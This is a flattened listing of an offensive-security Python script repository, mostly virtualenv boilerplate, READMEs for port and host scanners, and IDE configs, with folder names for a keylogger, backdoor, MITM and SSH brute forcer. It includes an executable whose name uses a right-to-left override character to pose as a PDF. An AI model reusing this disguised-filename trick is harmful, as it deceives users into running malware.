/MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/urllib3/contrib/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /MacChanger/venv/pyvenv.cfg: -------------------------------------------------------------------------------- 1 | home = /usr/bin 2 | include-system-site-packages = false 3 | version = 3.7.6 4 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_internal/operations/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/urllib3/contrib/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Package/package‮fdp.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/Package/package‮fdp.exe -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/certifi-2019.11.28.dist-info/top_level.txt: -------------------------------------------------------------------------------- 1 | certifi 2 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/EGG-INFO/dependency_links.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_internal/operations/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/__init__.py: -------------------------------------------------------------------------------- 1 | __version__ = "19.0.3" 2 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/chardet/cli/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/html5lib/filters/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /NetworkScanner/venv/pyvenv.cfg: -------------------------------------------------------------------------------- 1 | home = /usr/bin 2 | include-system-site-packages = false 3 | version = 3.7.6 4 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/chardet/cli/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/html5lib/filters/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/urllib3/contrib/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/urllib3/packages/backports/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/__init__.py: -------------------------------------------------------------------------------- 1 | __version__ = "19.0.3" 2 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/pyvenv.cfg: -------------------------------------------------------------------------------- 1 | home = /usr/bin 2 | include-system-site-packages = false 3 | version = 3.7.5 4 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/easy-install.pth: -------------------------------------------------------------------------------- 1 | ./setuptools-40.8.0-py3.7.egg 2 | ./pip-19.0.3-py3.7.egg 3 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/msgpack/_version.py: -------------------------------------------------------------------------------- 1 | version = (0, 5, 6) 2 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/urllib3/contrib/_securetransport/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/urllib3/packages/backports/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/certifi/__main__.py: -------------------------------------------------------------------------------- 1 | from certifi import where 2 | print(where()) 3 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/urllib3/packages/backports/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/idna/package_data.py: -------------------------------------------------------------------------------- 1 | __version__ = '2.8' 2 | 3 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/easy-install.pth: -------------------------------------------------------------------------------- 1 | ./setuptools-40.8.0-py3.7.egg 2 | ./pip-19.0.3-py3.7.egg 3 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/msgpack/_version.py: -------------------------------------------------------------------------------- 1 | version = (0, 5, 6) 2 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/urllib3/contrib/_securetransport/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/bin/python: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/tcp_socket_client/venv/bin/python -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/easy-install.pth: -------------------------------------------------------------------------------- 1 | ./setuptools-40.8.0-py3.7.egg 2 | ./pip-19.0.3-py3.7.egg 3 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/msgpack/_version.py: -------------------------------------------------------------------------------- 1 | version = (0, 5, 6) 2 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/urllib3/contrib/_securetransport/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/idna/package_data.py: -------------------------------------------------------------------------------- 1 | __version__ = '2.8' 2 | 3 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/bin/python3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/tcp_socket_client/venv/bin/python3 -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/idna/__init__.py: -------------------------------------------------------------------------------- 1 | from .package_data import __version__ 2 | from .core import * 3 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/idna/package_data.py: -------------------------------------------------------------------------------- 1 | __version__ = '2.8' 2 | 3 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/bin/python3.7: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/tcp_socket_client/venv/bin/python3.7 -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/certifi/__init__.py: -------------------------------------------------------------------------------- 1 | from .core import where 2 | 3 | __version__ = "2019.11.28" 4 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/certifi/__main__.py: -------------------------------------------------------------------------------- 1 | from pip._vendor.certifi import where 2 | print(where()) 3 | -------------------------------------------------------------------------------- /SSH_Brute_Forcing/README.md: -------------------------------------------------------------------------------- 1 | # Usage: 2 | 3 | ![image](https://github.com/h4md153v63n/Python_Scripts/assets/5091265/1abbe4fa-b36d-4e63-9c68-40ac47392c44) 4 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/certifi/__init__.py: -------------------------------------------------------------------------------- 1 | from .core import where 2 | 3 | __version__ = "2018.11.29" 4 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/idna/__init__.py: -------------------------------------------------------------------------------- 1 | from .package_data import __version__ 2 | from .core import * 3 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/certifi/__main__.py: -------------------------------------------------------------------------------- 1 | from pip._vendor.certifi import where 2 | print(where()) 3 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/idna/__init__.py: -------------------------------------------------------------------------------- 1 | from .package_data import __version__ 2 | from .core import * 3 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/chardet-3.0.4.dist-info/entry_points.txt: -------------------------------------------------------------------------------- 1 | [console_scripts] 2 | chardetect = chardet.cli.chardetect:main 3 | 4 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_internal/models/__init__.py: -------------------------------------------------------------------------------- 1 | """A package that contains models that represent entities. 2 | """ 3 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/certifi/__init__.py: -------------------------------------------------------------------------------- 1 | from .core import where 2 | 3 | __version__ = "2018.11.29" 4 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/certifi/__init__.py: -------------------------------------------------------------------------------- 1 | from .core import where 2 | 3 | __version__ = "2018.11.29" 4 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/certifi/__main__.py: -------------------------------------------------------------------------------- 1 | from pip._vendor.certifi import where 2 | print(where()) 3 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/idna/__init__.py: -------------------------------------------------------------------------------- 1 | from .package_data import __version__ 2 | from .core import * 3 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_internal/models/__init__.py: -------------------------------------------------------------------------------- 1 | """A package that contains models that represent entities. 2 | """ 3 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/scapy/arch/bpf/__init__.py: -------------------------------------------------------------------------------- 1 | # Guillaume Valadon 2 | 3 | """ 4 | Scapy *BSD native support 5 | """ 6 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_internal/models/__init__.py: -------------------------------------------------------------------------------- 1 | """A package that contains models that represent entities. 2 | """ 3 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/scapy-2.4.3-py3.7.egg-info/entry_points.txt: -------------------------------------------------------------------------------- 1 | [console_scripts] 2 | UTscapy = scapy.tools.UTscapy:main 3 | scapy = scapy.main:interact 4 | 5 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/pep517/__init__.py: -------------------------------------------------------------------------------- 1 | """Wrappers to build Python packages using PEP 517 hooks 2 | """ 3 | 4 | __version__ = '0.5.0' 5 | -------------------------------------------------------------------------------- /PortScanner_2/README.md: -------------------------------------------------------------------------------- 1 | # Usage: 2 | 3 | `python3 portenum.py 10.10.252.150` 4 | 5 | ![image](https://github.com/h4md153v63n/Python_Scripts/assets/5091265/a4ee2834-e75f-436e-abe1-55fa1a1355e0) 6 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/cachecontrol/caches/__init__.py: -------------------------------------------------------------------------------- 1 | from .file_cache import FileCache # noqa 2 | from .redis_cache import RedisCache # noqa 3 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/pep517/__init__.py: -------------------------------------------------------------------------------- 1 | """Wrappers to build Python packages using PEP 517 hooks 2 | """ 3 | 4 | __version__ = '0.5.0' 5 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/scapy-2.4.3-py3.7.egg-info/requires.txt: -------------------------------------------------------------------------------- 1 | 2 | [basic] 3 | ipython 4 | 5 | [complete] 6 | ipython 7 | pyx 8 | cryptography>=2.0 9 | matplotlib 10 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/pep517/__init__.py: -------------------------------------------------------------------------------- 1 | """Wrappers to build Python packages using PEP 517 hooks 2 | """ 3 | 4 | __version__ = '0.5.0' 5 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/EGG-INFO/entry_points.txt: -------------------------------------------------------------------------------- 1 | [console_scripts] 2 | pip = pip._internal:main 3 | pip3 = pip._internal:main 4 | pip3.7 = pip._internal:main 5 | 6 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/setuptools-40.8.0-py3.7.egg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/MacChanger/venv/lib/python3.7/site-packages/setuptools-40.8.0-py3.7.egg -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/cachecontrol/caches/__init__.py: -------------------------------------------------------------------------------- 1 | from .file_cache import FileCache # noqa 2 | from .redis_cache import RedisCache # noqa 3 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/urllib3/packages/__init__.py: -------------------------------------------------------------------------------- 1 | from __future__ import absolute_import 2 | 3 | from . import ssl_match_hostname 4 | 5 | __all__ = ("ssl_match_hostname",) 6 | -------------------------------------------------------------------------------- /FileDownloader/downloader.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | url = 'https://download.sysinternals.com/files/PSTools.zip' 4 | r = requests.get(url, allow_redirects=True) 5 | open('PSTools.zip', 'wb').write(r.content) 6 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/EGG-INFO/entry_points.txt: -------------------------------------------------------------------------------- 1 | [console_scripts] 2 | pip = pip._internal:main 3 | pip3 = pip._internal:main 4 | pip3.7 = pip._internal:main 5 | 6 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/setuptools-40.8.0-py3.7.egg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/NetworkScanner/venv/lib/python3.7/site-packages/setuptools-40.8.0-py3.7.egg -------------------------------------------------------------------------------- /tcp_socket_client/.idea/dictionaries/root.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | hamdi 5 | 6 | 7 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/idna-2.8.dist-info/WHEEL: -------------------------------------------------------------------------------- 1 | Wheel-Version: 1.0 2 | Generator: bdist_wheel (0.32.2) 3 | Root-Is-Purelib: true 4 | Tag: py2-none-any 5 | Tag: py3-none-any 6 | 7 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/cachecontrol/caches/__init__.py: -------------------------------------------------------------------------------- 1 | from .file_cache import FileCache # noqa 2 | from .redis_cache import RedisCache # noqa 3 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/chardet-3.0.4.dist-info/WHEEL: -------------------------------------------------------------------------------- 1 | Wheel-Version: 1.0 2 | Generator: bdist_wheel (0.29.0) 3 | Root-Is-Purelib: true 4 | Tag: py2-none-any 5 | Tag: py3-none-any 6 | 7 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/EGG-INFO/entry_points.txt: -------------------------------------------------------------------------------- 1 | [console_scripts] 2 | pip = pip._internal:main 3 | pip3 = pip._internal:main 4 | pip3.7 = pip._internal:main 5 | 6 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/requests-2.22.0.dist-info/WHEEL: -------------------------------------------------------------------------------- 1 | Wheel-Version: 1.0 2 | Generator: bdist_wheel (0.33.4) 3 | Root-Is-Purelib: true 4 | Tag: py2-none-any 5 | Tag: py3-none-any 6 | 7 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/setuptools-40.8.0-py3.7.egg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/tcp_socket_client/venv/lib/python3.7/site-packages/setuptools-40.8.0-py3.7.egg -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/urllib3-1.25.7.dist-info/WHEEL: -------------------------------------------------------------------------------- 1 | Wheel-Version: 1.0 2 | Generator: bdist_wheel (0.33.6) 3 | Root-Is-Purelib: true 4 | Tag: py2-none-any 5 | Tag: py3-none-any 6 | 7 | -------------------------------------------------------------------------------- /Mitm/.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/certifi-2019.11.28.dist-info/WHEEL: -------------------------------------------------------------------------------- 1 | Wheel-Version: 1.0 2 | Generator: bdist_wheel (0.30.0.a0) 3 | Root-Is-Purelib: true 4 | Tag: py2-none-any 5 | Tag: py3-none-any 6 | 7 | -------------------------------------------------------------------------------- /KeyLogger/.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /BackDoor/.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /MacChanger/.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/pytoml/__init__.py: -------------------------------------------------------------------------------- 1 | from .core import TomlError 2 | from .parser import load, loads 3 | from .test import translate_to_test 4 | from .writer import dump, dumps -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/urllib3/packages/__init__.py: -------------------------------------------------------------------------------- 1 | from __future__ import absolute_import 2 | 3 | from . import ssl_match_hostname 4 | 5 | __all__ = ('ssl_match_hostname', ) 6 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/pytoml/__init__.py: -------------------------------------------------------------------------------- 1 | from .core import TomlError 2 | from .parser import load, loads 3 | from .test import translate_to_test 4 | from .writer import dump, dumps -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/urllib3/packages/__init__.py: -------------------------------------------------------------------------------- 1 | from __future__ import absolute_import 2 | 3 | from . import ssl_match_hostname 4 | 5 | __all__ = ('ssl_match_hostname', ) 6 | -------------------------------------------------------------------------------- /tcp_socket_client/.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/idna/__pycache__/codec.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/tcp_socket_client/venv/lib/python3.7/site-packages/idna/__pycache__/codec.cpython-37.pyc -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/idna/__pycache__/core.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/tcp_socket_client/venv/lib/python3.7/site-packages/idna/__pycache__/core.cpython-37.pyc -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_internal/cli/__init__.py: -------------------------------------------------------------------------------- 1 | """Subpackage containing all of pip's command line interface related code 2 | """ 3 | 4 | # This file intentionally does not import submodules 5 | -------------------------------------------------------------------------------- /NetworkScanner/.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /PacketListener/.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/certifi/__pycache__/core.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/tcp_socket_client/venv/lib/python3.7/site-packages/certifi/__pycache__/core.cpython-37.pyc -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/idna/__pycache__/compat.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/tcp_socket_client/venv/lib/python3.7/site-packages/idna/__pycache__/compat.cpython-37.pyc -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/pytoml/__init__.py: -------------------------------------------------------------------------------- 1 | from .core import TomlError 2 | from .parser import load, loads 3 | from .test import translate_to_test 4 | from .writer import dump, dumps -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/urllib3/packages/__init__.py: -------------------------------------------------------------------------------- 1 | from __future__ import absolute_import 2 | 3 | from . import ssl_match_hostname 4 | 5 | __all__ = ('ssl_match_hostname', ) 6 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/requests/__pycache__/api.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/tcp_socket_client/venv/lib/python3.7/site-packages/requests/__pycache__/api.cpython-37.pyc -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/distlib/t32.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/distlib/t32.exe -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/distlib/t64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/distlib/t64.exe -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/distlib/w32.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/distlib/w32.exe -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/distlib/w64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/distlib/w64.exe -------------------------------------------------------------------------------- /Mitm/.idea/inspectionProfiles/profiles_settings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 6 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_internal/cli/__init__.py: -------------------------------------------------------------------------------- 1 | """Subpackage containing all of pip's command line interface related code 2 | """ 3 | 4 | # This file intentionally does not import submodules 5 | -------------------------------------------------------------------------------- /NetworkScanner_2/README.md: -------------------------------------------------------------------------------- 1 | # Usage: 2 | 3 | - `apt install python3-scapy` 4 | - `python3 host_scan.py eth0 10.10.252.0/24` 5 | 6 | ![image](https://github.com/h4md153v63n/Python_Scripts/assets/5091265/0d192c54-24e0-4f27-8ef8-d883c4cf265c) 7 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/chardet/__pycache__/compat.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/tcp_socket_client/venv/lib/python3.7/site-packages/chardet/__pycache__/compat.cpython-37.pyc -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/chardet/__pycache__/enums.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/tcp_socket_client/venv/lib/python3.7/site-packages/chardet/__pycache__/enums.cpython-37.pyc -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/chardet/__pycache__/escsm.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/tcp_socket_client/venv/lib/python3.7/site-packages/chardet/__pycache__/escsm.cpython-37.pyc -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/chardet/__pycache__/jisfreq.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/tcp_socket_client/venv/lib/python3.7/site-packages/chardet/__pycache__/jisfreq.cpython-37.pyc -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/chardet/__pycache__/jpcntx.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/tcp_socket_client/venv/lib/python3.7/site-packages/chardet/__pycache__/jpcntx.cpython-37.pyc -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/chardet/__pycache__/mbcssm.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/tcp_socket_client/venv/lib/python3.7/site-packages/chardet/__pycache__/mbcssm.cpython-37.pyc -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/chardet/__pycache__/version.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/tcp_socket_client/venv/lib/python3.7/site-packages/chardet/__pycache__/version.cpython-37.pyc -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/idna/__pycache__/__init__.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/tcp_socket_client/venv/lib/python3.7/site-packages/idna/__pycache__/__init__.cpython-37.pyc -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/idna/__pycache__/idnadata.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/tcp_socket_client/venv/lib/python3.7/site-packages/idna/__pycache__/idnadata.cpython-37.pyc -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/idna/__pycache__/intranges.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/tcp_socket_client/venv/lib/python3.7/site-packages/idna/__pycache__/intranges.cpython-37.pyc -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/idna/__pycache__/uts46data.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/tcp_socket_client/venv/lib/python3.7/site-packages/idna/__pycache__/uts46data.cpython-37.pyc -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/requests/__pycache__/auth.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/tcp_socket_client/venv/lib/python3.7/site-packages/requests/__pycache__/auth.cpython-37.pyc -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/requests/__pycache__/certs.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/tcp_socket_client/venv/lib/python3.7/site-packages/requests/__pycache__/certs.cpython-37.pyc -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/requests/__pycache__/compat.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/tcp_socket_client/venv/lib/python3.7/site-packages/requests/__pycache__/compat.cpython-37.pyc -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/requests/__pycache__/help.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h4md153v63n/Python_Scripts/HEAD/tcp_socket_client/venv/lib/python3.7/site-packages/requests/__pycache__/help.cpython-37.pyc -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/requests/__pycache__/hooks.cpython-37.pyc: -------------------------------------------------------------------------------- 